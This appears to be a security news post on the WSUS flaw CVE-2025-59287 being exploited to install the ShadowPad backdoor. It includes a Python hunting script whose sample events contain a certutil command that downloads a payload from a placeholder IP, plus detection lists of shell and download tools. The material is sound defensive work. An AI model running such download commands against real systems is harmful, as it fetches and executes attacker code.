A recently patched security vulnerability in Microsoft Windows Server Update Services (WSUS) has been exploited by cybercriminals to deploy the ShadowPad malware. This incident highlights a serious threat, as the attackers leveraged the known CVE-2025-59287 flaw to gain initial access to targeted systems.
According to the AhnLab Security Intelligence Center (ASEC), the attackers targeted Windows Servers with the WSUS role enabled. They exploited the vulnerability to obtain a system-level shell using PowerCat, a PowerShell-based netcat equivalent. From that shell they downloaded and installed the ShadowPad malware using built-in Windows utilities such as certutil and curl.
ShadowPad, which has been linked to Chinese state-aligned threat actors, is a versatile backdoor that supports a wide range of malicious activity. It emerged in 2015 and is regarded as a sophisticated tool now used by several state-sponsored hacking groups; analysts have previously described it as a flagship backdoor of state-sponsored cyber espionage.
CVE-2025-59287 is a critical deserialization vulnerability that enables remote code execution with SYSTEM privileges. Although Microsoft issued a patch for the flaw last month, it has been heavily exploited since its discovery. Attackers have used it to access publicly exposed WSUS instances, conduct reconnaissance, and deploy legitimate tools intended for security analysis.
The attackers were also observed using the legitimate Windows binary "ETDCtrlHelper.exe" to side-load a malicious DLL payload ("ETDApix.dll"). Once installed, ShadowPad's shellcode loader manages additional plugins while employing a variety of techniques to evade detection and maintain persistence.
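The two observable stages of the chain above (a WSUS process spawning a shell or a certutil/curl download, then ETDCtrlHelper.exe loading ETDApix.dll) can be turned into a simple hunt over process-creation and image-load telemetry. The following is an added example written for this post, not ASEC's or Microsoft's code; the WSUS parent process names (w3wp.exe, WsusService.exe), the Sysmon-style field names and all sample events are assumptions or constructed data, not from the report.

```python
"""Hunt for the WSUS -> ShadowPad chain in constructed Sysmon-style events (added example)."""
import ntpath

# Children named in the report: a shell (PowerCat runs under PowerShell) and the download LOLBins.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe"}
# ASSUMPTION: processes that host WSUS (IIS worker for the WSUS app pool, WSUS service).
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
# Side-loading pair named in the report.
SIDELOAD_HOST, SIDELOAD_DLL = "etdctrlhelper.exe", "etdapix.dll"
TRUSTED_DLL_ROOTS = ("c:\\program files", "c:\\windows\\")  # assumption: legit install locations

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def flag_process_event(ev):
    """Event ID 1: WSUS process spawning a shell, or a LOLBin pulling from a URL."""
    parent, image, cmd = base(ev["ParentImage"]), base(ev["Image"]), ev["CommandLine"].lower()
    if parent in WSUS_PARENTS and image in SUSPICIOUS_CHILDREN:
        return f"{ev['Computer']}: {parent} spawned {image} ({ev['CommandLine']})"
    if image in DOWNLOADERS and "http" in cmd:
        return f"{ev['Computer']}: {image} downloading from URL ({ev['CommandLine']})"
    return None

def flag_image_load(ev):
    """Event ID 7: ETDCtrlHelper.exe loading ETDApix.dll from outside a trusted root."""
    dll = ev["ImageLoaded"]
    if base(ev["Image"]) == SIDELOAD_HOST and base(dll) == SIDELOAD_DLL:
        if not dll.lower().startswith(TRUSTED_DLL_ROOTS):
            return f"{ev['Computer']}: {SIDELOAD_HOST} side-loaded {dll}"
    return None

def hunt(events):
    """Return a list of finding strings for the given events."""
    rules = {1: flag_process_event, 7: flag_image_load}
    findings = [rules[ev["EventID"]](ev) for ev in events if ev["EventID"] in rules]
    return [f for f in findings if f]

# Constructed sample events (hostnames, paths and the 203.0.113.5 address are made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "wsus01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell.exe -File pc.ps1"},
    {"EventID": 1, "Computer": "wsus01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil.exe -urlcache -f http://203.0.113.5/x.bin x.bin"},
    {"EventID": 1, "Computer": "wsus01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe"},
    {"EventID": 7, "Computer": "wsus01", "Image": r"C:\ProgramData\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\ProgramData\ETDApix.dll"},
    {"EventID": 7, "Computer": "lap07", "Image": r"C:\Program Files\OEM Touchpad\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\Program Files\OEM Touchpad\ETDApix.dll"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

On the constructed sample the hunt reports three findings (the w3wp.exe to cmd.exe spawn, the certutil download, and the ProgramData side-load) and ignores the benign conhost.exe child and the workstation's touchpad DLL under Program Files.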
As the threat landscape continues to evolve, organizations should install patches promptly and review their exposure to known vulnerabilities, particularly those that grant significant access to and control over systems, as this one does.
For further details on the vulnerability and malware discussed, see the references on CVE-2025-59287 and the ShadowPad malware.